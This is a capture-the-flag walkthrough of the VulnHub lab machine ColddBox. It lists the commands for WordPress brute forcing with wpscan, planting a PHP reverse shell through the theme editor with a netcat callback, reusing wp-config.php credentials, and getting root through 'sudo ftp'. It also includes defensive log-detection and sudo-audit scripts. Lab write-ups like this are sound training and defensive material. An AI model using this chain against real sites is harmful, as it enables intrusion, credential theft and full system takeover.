Platform: VulnHub | Difficulty: Easy | OS: Linux (Ubuntu) | Author: Abacus
Introduction
ColddBox is a beginner-friendly VulnHub machine that walks you through a classic attack chain: network discovery → WordPress enumeration → brute-force login → reverse shell via theme editor → credential reuse for lateral movement → privilege escalation via sudo misconfiguration. It's a great box for anyone just starting out with CTFs or penetration testing fundamentals.
Skills covered:
- Network discovery with netdiscover
- Port/service scanning with nmap
- Directory brute-forcing with dirb
- WordPress credential attack with wpscan
- Reverse shell injection via WordPress theme editor
- Lateral movement using credentials from wp-config.php
- Privilege escalation via GTFOBins (ftp sudo exploit)
Step 1 — Network Discovery
The first step is finding the target machine's IP address on the local network. I used netdiscover to scan the subnet:
netdiscover -i eth0
From the ARP scan results, the target IP was identified as 192.168.1.3 (PCS Systemtechnik GmbH MAC — a VirtualBox adapter, confirming it's our VM).
Step 2 — Port Scanning with Nmap
With the IP in hand, I ran a full Nmap service scan:
nmap -sV -sC 192.168.1.3
Results:
Port      State  Service  Version
80/tcp    open   http     Apache 2.4.18 (Ubuntu) — WordPress 4.1.31
4512/tcp  open   ssh      OpenSSH 7.2p2 Ubuntu
Key findings:
- Port 80 is running a WordPress site titled "ColddBox — One more machine"
- Port 4512 is running SSH (non-standard port — worth noting for later)
Step 3 — Web Enumeration
Browsing to http://192.168.1.3 revealed a minimal WordPress homepage with the message "The ColddBox is here" — not much to go on directly.
Since we already know it's WordPress, I used dirb to brute-force directories and find the login panel:
dirb http://192.168.1.3
Interesting paths found:
==> DIRECTORY: http://192.168.1.3/hidden/
==> DIRECTORY: http://192.168.1.3/wp-admin/
==> DIRECTORY: http://192.168.1.3/wp-content/
+ http://192.168.1.3/wp-admin/admin.php
The /wp-admin login page was confirmed live. Default credential combinations didn't work, so it was time to brute-force.
Step 4 — WordPress Brute Force with WPScan
Based on the box name (ColddBox), I made an educated guess that the username was c0ldd and used wpscan with the classic rockyou.txt wordlist:
wpscan --url http://192.168.1.3 --usernames c0ldd --passwords /usr/share/wordlists/rockyou.txt
After ~1366 requests, we had a hit:
[SUCCESS] - c0ldd / 9876543210
Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
Logged into the WordPress dashboard successfully.
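From the defender's side, the wpscan run above is loud: hundreds of POSTs to wp-login.php from a single IP in a short window. The following is an added example (not part of the original writeup) that flags that pattern in Apache combined-format access logs, and also flags a POST to the theme editor, the write that the next step abuses. The log lines are constructed and the threshold is an assumption; tune it to your site's normal traffic.

```python
# Added example, not from the original writeup: flag two WordPress signals in
# Apache combined-format access logs: a login brute force (many POSTs to
# /wp-login.php from one IP) and a theme-editor save (POST to
# /wp-admin/theme-editor.php). Sample log lines and threshold are constructed.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

BRUTE_FORCE_THRESHOLD = 20  # assumed: POSTs to wp-login.php per IP before alerting

def make_sample_log(attacker="192.168.1.10", attempts=25):
    """Constructed log: one client hammering the login form, one normal user,
    then the first client saving a theme file through the editor."""
    lines = []
    for i in range(attempts):
        lines.append(f'{attacker} - - [10/May/2024:12:00:{i % 60:02d} +0000] '
                     '"POST /wp-login.php HTTP/1.1" 200 3201 "-" "constructed-scanner/1.0"')
    lines.append('192.168.1.55 - - [10/May/2024:12:00:30 +0000] '
                 '"POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    lines.append(f'{attacker} - - [10/May/2024:12:05:00 +0000] '
                 '"POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return "\n".join(lines)

def analyze(log_text, threshold=BRUTE_FORCE_THRESHOLD):
    """Return a list of (rule, ip, detail) alerts for the given access log text."""
    login_posts = Counter()
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a production pipeline should count these
        ip, method, path = m["ip"], m["method"], m["path"].split("?")[0]
        if method == "POST" and path == "/wp-login.php":
            login_posts[ip] += 1
        elif method == "POST" and path == "/wp-admin/theme-editor.php":
            # Any write through the editor deserves a ticket. Hardening: adding
            # define('DISALLOW_FILE_EDIT', true); to wp-config.php removes the editor.
            alerts.append(("theme_editor_write", ip, f"{m['status']} at {m['ts']}"))
    for ip, n in login_posts.items():
        if n >= threshold:
            alerts.append(("wp_login_brute_force", ip, f"{n} POSTs to /wp-login.php"))
    return alerts

if __name__ == "__main__":
    for alert in analyze(make_sample_log()):
        print(alert)
```

Counting per IP over the whole file is deliberately simple; for live logs, use a sliding time window and whitelist known management addresses.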
Step 5 — Remote Code Execution via Theme Editor
Inside the WordPress dashboard, I navigated to:
Appearance → Editor → header.php (Twenty Fifteen theme)
I replaced the entire contents of header.php with a Pentestmonkey PHP reverse shell, updating the IP and port:
$ip = '192.168.1.10'; // Your attacker IP
$port = 7777;
Set up a Netcat listener on the attacker machine:
nc -nlvp 7777
Then refreshed the WordPress homepage to trigger the shell. Got a connection back immediately:
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.3] 55214
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Upgraded to a proper interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Step 6 — Lateral Movement via wp-config.php
Navigated to the WordPress root directory to hunt for credentials:
cd /var/www/html
cat wp-config.php
Found hardcoded database credentials:
define('DB_NAME', 'colddbox');
define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');
define('DB_HOST', 'localhost');
Used the DB password to switch to the c0ldd system user:
su c0ldd
Password: cybersecurity
Successfully switched users. Now operating as c0ldd.
Step 7 — Privilege Escalation via Sudo + GTFOBins
Checked what sudo permissions c0ldd has:
sudo -l
Output:
User c0ldd may run the following commands on ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
Three potential escalation paths! I chose ftp since it's straightforward via GTFOBins.
sudo ftp
ftp> !/bin/sh
Checked privileges:
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
We are root. 🎉
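The sudo grants above are the kind of thing an administrator can catch before an attacker does. As an added example (not from the original writeup), here is a small audit that parses the output format shown by sudo -l and flags root-runnable binaries that GTFOBins documents as offering a shell escape. The sample text is constructed from the box's output plus one narrow grant that passes; the escape list is a partial subset of GTFOBins and is an assumption, not the full catalogue.

```python
# Added example, not from the original writeup: audit "sudo -l" grants and flag
# root-runnable binaries known to escape to a shell. Sample output is
# constructed; SHELL_ESCAPE_BINARIES is a partial subset of GTFOBins (assumed).
import re

# Partial list (assumption): binaries GTFOBins documents as able to spawn a shell
# when run via sudo. Check GTFOBins itself for the full, current list.
SHELL_ESCAPE_BINARIES = {
    "vim", "vi", "ftp", "chmod", "chown", "find", "less", "more", "awk",
    "python", "python3", "perl", "env", "bash", "sh", "nmap", "tar",
}

# Matches grant lines such as "(root) /usr/bin/vim" or "(root) NOPASSWD: /bin/x".
GRANT_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_SUDO_L = """\
User c0ldd may run the following commands on ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) NOPASSWD: /usr/local/bin/backup.sh
"""

def parse_grants(sudo_l_output):
    """Return (runas, tags, command) tuples, one per command in each grant line."""
    grants = []
    for line in sudo_l_output.splitlines():
        m = GRANT_RE.match(line)
        if not m:
            continue  # header lines and blank lines
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        for cmd in m["cmds"].split(","):
            if cmd.strip():
                grants.append((m["runas"].strip(), tags, cmd.strip()))
    return grants

def audit(sudo_l_output):
    """Return findings as (severity, command, reason) for risky grants."""
    findings = []
    for runas, tags, cmd in parse_grants(sudo_l_output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]  # drop path and arguments
        root_runas = runas.split(":")[0].strip() in ("root", "ALL")
        if cmd == "ALL" and root_runas:
            findings.append(("critical", cmd, "unrestricted root sudo"))
        elif root_runas and binary in SHELL_ESCAPE_BINARIES:
            sev = "critical" if "NOPASSWD" in tags else "high"
            findings.append((sev, cmd, f"{binary} can spawn a root shell (see GTFOBins)"))
    # A grant like backup.sh passes only if the script is root-owned and not writable.
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L):
        print(*finding)
```

Run it against `sudo -l -U <user>` output on each host, or feed it the parsed sudoers rules from your configuration management, to spot these grants before they are used for escalation.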
Step 8 — Capturing the Flag
cd /root
ls
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYVNFLW...
Root flag captured!
Summary
Here's the full attack chain at a glance:
Network Scan (netdiscover)
↓
Port Scan (nmap) → Port 80: WordPress
↓
Directory Enum (dirb) → /wp-admin found
↓
Brute Force (wpscan) → c0ldd:9876543210
↓
WordPress Login → Theme Editor RCE
↓
Reverse Shell (www-data)
↓
wp-config.php → DB creds → su c0ldd
↓
sudo -l → ftp → !/bin/sh
↓
ROOT ✓
Key Takeaways
- Non-standard SSH ports (like 4512) are worth noting — they might be useful for lateral movement with found credentials.
- WordPress theme/plugin editors are a classic and powerful RCE vector when admin access is obtained.
- Config files like wp-config.php often contain credentials that are reused at the system level — always check them.
- GTFOBins is an essential resource. When sudo -l shows binaries like vim, ftp, or chmod, there's almost always a privesc path.
- Sudo misconfiguration is one of the most common privesc vectors in real-world environments — always check it.
Tools Used
Tool                             Purpose
netdiscover                      Host discovery on local network
nmap                             Port & service enumeration
dirb                             Web directory brute-forcing
wpscan                           WordPress vulnerability & credential scanner
Pentestmonkey PHP Reverse Shell  Remote code execution
netcat (nc)                      Reverse shell listener
GTFOBins                         Privilege escalation reference
Happy hacking! If you found this helpful, follow for more VulnHub and CTF writeups.
— Abacus
Tags: #cybersecurity #ethicalhacking #ctf #vulnhub #penetrationtesting #infosec #linux #wordpress